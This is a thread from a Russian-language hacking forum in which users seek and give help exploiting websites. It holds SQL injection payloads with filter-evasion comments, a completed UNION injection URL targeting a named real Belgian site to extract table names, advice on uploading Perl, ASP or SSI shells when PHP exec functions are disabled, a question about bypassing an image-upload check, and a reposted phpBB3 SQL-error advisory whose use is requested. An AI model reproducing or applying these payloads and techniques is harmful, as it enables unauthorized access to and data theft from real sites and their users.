Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Как организовать backconnect/bind при отключенных функциях php
    exec,passthru,shell_exec,system,proc_open,popen?
    Если можно, подробнее.
     
  2. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Какие еще оболочки присутствуют на серваке?
    Попробуй залить Шеллы на перле,асп'е,ssi
    На них уже ограничения не действуют
     
  3. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
  4. Stricker

    Stricker New Member

    Joined:
    20 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, вопрос такой:
    Изображение заливается, и присваивается ему расширение исходя из Mime Type От getimagesize
    Как обойти и чтобы назначилось php Значение?
     
  5. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Нету ничего, окромя пхп.

    kroŧ
    У меня функция отключена
     
  6. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    на друпал 5.23 есть уязвимость с мускулом?
     
  7. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
    при инъекции
    все ок, т.е. вывод есть
    но когда пытаюсь получить имена таблиц
    PHP:
    -235/**//*!union*//**//*!select*//**/group_concat(table_name),2,3/**//*!from*//**/information_schema.tables--
    сайт ругается
    как вытащить имена ? :)
     
  8. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    А unhex(hex('xyu')) попробовать?
     
  9. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    пробовал - ругается. попробовал вот так
    вывело тупо table_name,table_name,table_name
     
  10. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Начнем с того, что частенько фильтруется или для юзера нет прав на _schema.tables, быть может поможет что-то вида:

    union select group_concat(table_name) from information_schema.columns where column_name like '%pass%' (или hex представление)
     
  11. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Никто?
     
  12. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Это не SQLi.
     
  13. borntobebad

    borntobebad New Member

    Joined:
    23 Mar 2009
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    помогите найти название таблицы .
    view-source:http://www.clapwall onie.be/www/liste_ techniciens?&idfig=-512+or+1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,31,table_name+FROM+test--+
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    _ttp://www.clapwallonie.be/www/liste_techniciens?&idfig=-512/**/and/**/1=2+union+select+1,null,null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,table_name,25,26,27,28,29,30,31,32+from+information_schema.tables+limit+0,1+--+

     
    _________________________
    1 person likes this.
  15. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Code:
    ------------------------------------------------------------------
    Name    : phpBB3 SQL Injection
    ------------------------------------------------------------------
    Date    : 27.07.2012
    ------------------------------------------------------------------
    Site    : www.phpbb.com
    ------------------------------------------------------------------
    Version : 3.0.10
    ------------------------------------------------------------------
     
    1) What is it?
      This is very nice forum board. You should try it!
    ------------------------------------------------------------------
    2) Type of bug?
      SQL Injection (or SQL-info-Leak if You want).
    ------------------------------------------------------------------
    3) Where is the bug?
      Vulnerable parameter seems to be 'style' because if we set up this parameter
    to 'bigger number' (for example: 111111111) we will get an error, with full SQL
    statement.
     
    *updated - dateformat is the second vulnerable parameter!
    *updated - post_st is the 3rd vulnerable parameter!
    *updated - another one: topic_st
     
     
    4) PoC traffic from Burp:
    4.1) Request :
     
    ---
    POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
    Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258
    Connection: close
     
    viewemail=1
    &massemail=1
    &allowpm=1
    &hideonline=0
    &notifypm=1
    &popuppm=0
    &lang=en
    &style=%2b1111111111
    &tz=0
    &dst=0
    &dateoptions=D+M+d%2C+Y+g%3Ai+a
    &dateformat=D+M+d%2C+Y+g%3Ai+a
    &submit=Submit
    &creation_time=1343370877
    &form_token=576...
     
    ---
     
    4.2) Response:
     
    ---
    HTTP/1.1 503 Service Unavailable
    Date: Fri, 27 Jul 2012 06:39:06 GMT
    Server: Apache/2.2.22 (Ubuntu)
    X-Powered-By: PHP/5.3.10-1ubuntu3.2
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    Content-Length: 2889
     
     
    <!DOCTYPE html PUBLIC "(...)
     
    <a href="./">Return to the index page</a> </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br />
    <br />SQL<br /><br />UPDATE phpbb_users
    SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1, 
    user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0, 
    user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
    WHERE user_id = 2<br />
    <br />BACKTRACE<br /><div style="font-family: monospace;"><br />
    <b>FILE:</b> [ROOT]/includes/db/mysqli.php<br />
    <b>LINE:</b> 182<br />
    <b>CALL:</b> dbal->sql_error()<br /><br />
    <b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php
    <br /><b>LINE:</b> 100<br />
    <b>CALL:</b> dbal_mysqli->sql_query()<br /><br />
    <b>FILE:</b> [ROOT]/includes/functions_module.php<br />
    <b>LINE:</b> 507<br />
    <b>CALL:</b> ucp_prefs->main()<br />
    <br /><b>FILE:</b> [ROOT]/ucp.php<br />
    <b>LINE:</b> 333<br />
    <b>CALL:</b> p_master->load_active()<br />
    </div><br /></div>
    <p>Please notify the board administrator or webmaster: (...)
     
    ---
     
     
    4.2 Other response (this time from post_st parameter):
    ---
    </style></head><body id="errorpage"><div id="wrap">  
    <div id="page-header">    
    <a href="./">Return to the index page</a>  
    </div>  <div id="acp">  <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    <div>SQL ERROR [ mysqli ]<br /><br />
    Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]
    <br /><br />An SQL error occurred while fetching this page. 
    Please contact the <a href="(...)
    ---
     
    5) More?
     
    - Ethical hacking for Your company:
    http://hauntit.blogspot.com
     
    - Burp Proxy:
    http://www.portswigger.org 
     
    - phBB3 Download:
    http://www.phpbb.com 
    Как воспользоваться данной инъекцией, так неразу ответа не получил, научите плз, заранее благодарю.
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Для особо ленивых и не внимательных - маркирую цветом ...

    Code:
     
    4.1) Request :
     
    ---
    POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&amp;mode=personal HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
    Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258
    Connection: close
     
    viewemail=1
    &amp;massemail=1
    &amp;allowpm=1
    &amp;hideonline=0
    &amp;notifypm=1
    &amp;popuppm=0
    &amp;lang=en
    [COLOR=Magenta]&amp;style=%2b1111111111[/COLOR]
    &amp;tz=0
    &amp;dst=0
    &amp;dateoptions=D+M+d%2C+Y+g%3Ai+a
    &amp;dateformat=D+M+d%2C+Y+g%3Ai+a
    &amp;submit=Submit
    &amp;creation_time=1343370877
    &amp;form_token=576...
     
    ---
     
    4.2) Response:
     
    ---
    HTTP/1.1 503 Service Unavailable
    Date: Fri, 27 Jul 2012 06:39:06 GMT
    Server: Apache/2.2.22 (Ubuntu)
    X-Powered-By: PHP/5.3.10-1ubuntu3.2
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html
    Content-Length: 2889
     
     
    <!DOCTYPE html PUBLIC "(...)
     
    <a href="./">Return to the index page</a> </div> <div id="acp"> <div class="panel">
    <div id="content">
    <h1>General Error</h1>
    [COLOR=Magenta]<div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br />
    <br />SQL<br /><br />UPDATE phpbb_users
    SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1, 
    user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0, 
    user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
    WHERE user_id = 2<br />[/COLOR]
    <br />BACKTRACE<br /><div style="font-family: monospace;"><br />
    <b>FILE:</b> [ROOT]/includes/db/mysqli.php<br />
    <b>LINE:</b> 182<br />
    <b>CALL:</b> dbal->sql_error()<br /><br />
    <b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php
    <br /><b>LINE:</b> 100<br />
    <b>CALL:</b> dbal_mysqli->sql_query()<br /><br />
    <b>FILE:</b> [ROOT]/includes/functions_module.php<br />
    <b>LINE:</b> 507<br />
    <b>CALL:</b> ucp_prefs->main()<br />
    <br /><b>FILE:</b> [ROOT]/ucp.php<br />
    <b>LINE:</b> 333<br />
    <b>CALL:</b> p_master->load_active()<br />
    </div><br /></div>
    <p>Please notify the board administrator or webmaster: (...)
     
     
    _________________________
  17. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Большое спасибо за подсказку, но как мне её запустить. пробовал через wappex ничего не выходит. Заранее благодарю.
     
  18. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    news.php?id=0 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables - ok
    news.php?id=0 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables - новость не существует
    как можно обойти? :(
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    news.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables limit 0,1
     
    _________________________
  20. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    тоже самое...
     
Thread Status:
Not open for further replies.